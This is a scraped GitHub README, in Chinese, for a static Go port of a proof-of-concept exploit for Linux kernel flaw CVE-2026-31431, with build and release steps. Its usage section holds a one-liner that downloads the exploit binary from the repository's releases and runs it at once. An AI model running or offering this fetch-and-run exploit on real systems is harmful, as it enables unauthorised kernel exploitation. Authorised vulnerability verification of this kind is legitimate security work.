Percivalll/Copy-Fail-CVE-2026-31431-Statically-PoC

GitHub: Percivalll/Copy-Fail-CVE-2026-31431-Statically-PoC

将针对 CVE-2026-31431 漏洞的 PoC 移植为纯静态 Go 二进制文件,方便在无依赖的 Linux 环境中快速验证该内核安全缺陷。

Stars: 2 | Forks: 1

# Copy-Fail CVE-2026-31431 静态 Go PoC 本仓库包含来自 [`theori-io/copy-fail-CVE-2026-31431`](https://github.com/theori-io/copy-fail-CVE-2026-31431) 的公开 Python 概念验证程序的 Go 移植版。 该程序仅限 Linux 运行。它使用 Linux 的 `AF_ALG` 接口、AEAD 控制消息和 `splice(2)` 系统调用,在构建为小型静态 Go 二进制文件的同时,保留了原始 PoC 的行为。 ## 支持的目标平台 Release 构建适用于以下平台: - `linux/amd64` - `linux/arm64` - `linux/386` 每个二进制文件都嵌入了适用于相同目标架构的 payload ELF。 故意不发布 macOS 和 Windows 的构建版本,因为该 PoC 依赖于 Linux 特定的内核接口。 ## 下载 带标签的 Release 会发布压缩的静态二进制文件和校验和清单: - `copy-fail-poc-linux-amd64.tar.gz` - `copy-fail-poc-linux-arm64.tar.gz` - `copy-fail-poc-linux-386.tar.gz` - `SHA256SUMS` 使用以下命令验证下载的构件: ``` sha256sum -c SHA256SUMS ``` ## 本地构建 要求: - Go 1.25 或更新版本 - Go 工具链提供的 Linux 目标支持 构建当前主机架构: ``` CGO_ENABLED=0 go build -trimpath -ldflags='-s -w -buildid=' -o copy-fail-poc ./cmd/copy-fail-poc ``` 交叉构建 Linux 目标: ``` GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -trimpath -ldflags='-s -w -buildid=' -o copy-fail-poc-linux-amd64 ./cmd/copy-fail-poc ``` 受支持的 `GOARCH` 值为 `amd64`、`arm64` 和 `386`。 运行测试: ``` go test ./... go vet ./... ``` 测试仅覆盖非破坏性的辅助逻辑。它们不执行 PoC 的触发路径。 ## 使用方法 在你拥有或明确获得授权进行测试的 Linux 系统上运行该二进制文件: ``` ./copy-fail-poc-linux-* ``` 单行命令下载 Release 并运行: ``` sh -c 'set -e; case "$(uname -m)" in x86_64) a=amd64;; aarch64|arm64) a=arm64;; i386|i686) a=386;; *) echo "unsupported arch: $(uname -m)" >&2; exit 1;; esac; curl -fsSL "https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Statically-PoC/releases/latest/download/copy-fail-poc-linux-${a}.tar.gz" | tar xz; ./copy-fail-poc-linux-${a}' ``` 其行为取决于目标内核和本地系统配置。该二进制文件不保证在每台 Linux 系统上都能成功利用漏洞。 ## 发布流程 GitHub Actions 工作流在匹配 `v*` 的标签上触发运行,也可以从 Actions 选项卡手动启动。 创建一个发布版本: ``` git tag v0.1.0 git push origin v0.1.0 ``` 对于标签构建,工作流会创建一个 GitHub Release 并上传 Linux 构件及 `SHA256SUMS`。对于手动运行的情况,构件可从工作流运行记录中获取。 ## 安全声明 本项目仅用于授权的安全研究、防御性验证和教育审查。请勿在你未拥有或未获得明确测试许可的系统上运行。你有责任遵守所有适用的法律、合同和政策。 ## 致谢 - 原始 PoC:[`theori-io/copy-fail-CVE-2026-31431`](https://github.com/theori-io/copy-fail-CVE-2026-31431)
标签:AEAD, AF_ALG, CVE-2026-31431, ELF, EVTX分析, Go语言, Maven, PoC, splice系统调用, Web报告查看器, 内核漏洞, 安全渗透, 日志审计, 暴力破解, 漏洞验证, 程序破解, 网络安全, 跨平台编译, 隐私保护, 静态编译